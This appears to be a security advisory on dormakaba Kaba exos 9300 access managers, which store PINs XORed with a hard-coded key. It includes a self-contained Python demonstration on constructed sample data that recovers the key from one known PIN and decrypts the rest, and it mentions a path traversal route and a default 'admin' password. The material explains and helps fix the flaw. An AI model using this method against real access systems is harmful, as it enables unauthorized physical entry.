dormakaba Kaba exos 9300
- < 4.4.0
A vulnerability exists in dormakaba Kaba exos 9300: PIN codes are stored in an SQLite database on the access manager protected only by XOR with a hard-coded key. Because the key is fixed and shared across devices, this offers no more protection than storing the PINs in plaintext; anyone who can read the database can recover every PIN. This vulnerability affects all versions of the access managers K5 and K7 prior to BAME 06.00.
Exploitation of this vulnerability allows an attacker with read access to the database to decrypt all stored PIN codes, potentially leading to unauthorized physical access wherever PIN-based authentication is accepted.
The vulnerability can be reproduced by accessing the SQLite database of an affected dormakaba access manager 9200-k5 or 9200-k7 with a version prior to BAME 06.00. Once the database is accessible, the 'Cards' table can be queried to retrieve the stored PIN codes, which are recovered by XORing them with the hard-coded key. Alternatively, the path traversal vulnerability (CVE-2025-59099) can be exploited to read the database file directly and extract the PINs.
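The following example illustrates why a hard-coded XOR key is equivalent to plaintext storage, as described above. It is added here and is not dormakaba's code or the actual device database: the key, the column layout of the 'Cards' table and the card records are all constructed for illustration (the advisory names only the table). It shows both the direct decryption an attacker with the key performs and the known-plaintext recovery of the key from a single card whose PIN is already known, such as the attacker's own badge.

```python
import sqlite3

# Hypothetical key: the advisory does not disclose the real one. Any fixed key
# behaves the same way for this demonstration.
HARDCODED_KEY = b"\x5a\xc3\x3c\x96\x0f\xa5"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key. XOR is its own inverse, so the same
    function both obfuscates and recovers a PIN."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_sample_db() -> sqlite3.Connection:
    """In-memory stand-in for the access manager's SQLite database.
    Column names and card records are constructed; only the table name
    'Cards' comes from the advisory."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Cards (card_id INTEGER PRIMARY KEY, holder TEXT, pin BLOB)"
    )
    sample_cards = [(1, "alice", "1234"), (2, "bob", "987654"), (3, "carol", "0000")]
    for card_id, holder, pin in sample_cards:
        conn.execute(
            "INSERT INTO Cards VALUES (?, ?, ?)",
            (card_id, holder, xor_bytes(pin.encode(), HARDCODED_KEY)),
        )
    conn.commit()
    return conn


def dump_pins(conn: sqlite3.Connection, key: bytes) -> dict:
    """Recover every PIN in the Cards table with the hard-coded key.
    This is all an attacker who obtained the database file has to do."""
    rows = conn.execute("SELECT card_id, holder, pin FROM Cards").fetchall()
    return {holder: xor_bytes(bytes(pin), key).decode() for _, holder, pin in rows}


def recover_key(ciphertext: bytes, known_pin: str) -> bytes:
    """Known-plaintext attack: XORing one stored value with its known PIN
    yields the key bytes for every position that PIN covers. A PIN at least
    as long as the key recovers the whole key; a shorter one recovers a prefix."""
    return xor_bytes(ciphertext, known_pin.encode())


def main() -> None:
    conn = build_sample_db()
    # Attacker knows only their own PIN ("987654" for bob) and recovers the key.
    bob_blob = conn.execute("SELECT pin FROM Cards WHERE holder = 'bob'").fetchone()[0]
    key = recover_key(bytes(bob_blob), "987654")
    print("recovered key:", key.hex())
    # With the key, every other card's PIN falls out of the table.
    for holder, pin in dump_pins(conn, key).items():
        print(f"{holder}: {pin}")


if __name__ == "__main__":
    main()
```

The point of `recover_key` is that the attacker does not even need to extract the key from firmware: one known PIN in the database is enough, and from then on every record is readable. No per-record salt, no per-device key and no keyed integrity check means the XOR layer adds nothing beyond plaintext.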
Users are advised to update to the latest version of the dormakaba exos 9300 access manager. Access managers K7 can be updated to version BAME 06.00 or later, where this vulnerability is fixed. For access managers K5, the exposure can be reduced manually by changing the default password of the web interface, which is set to 'admin'; note that this only restricts access to the database and does not change how the PINs are stored, so the database file itself remains sensitive and should be treated accordingly.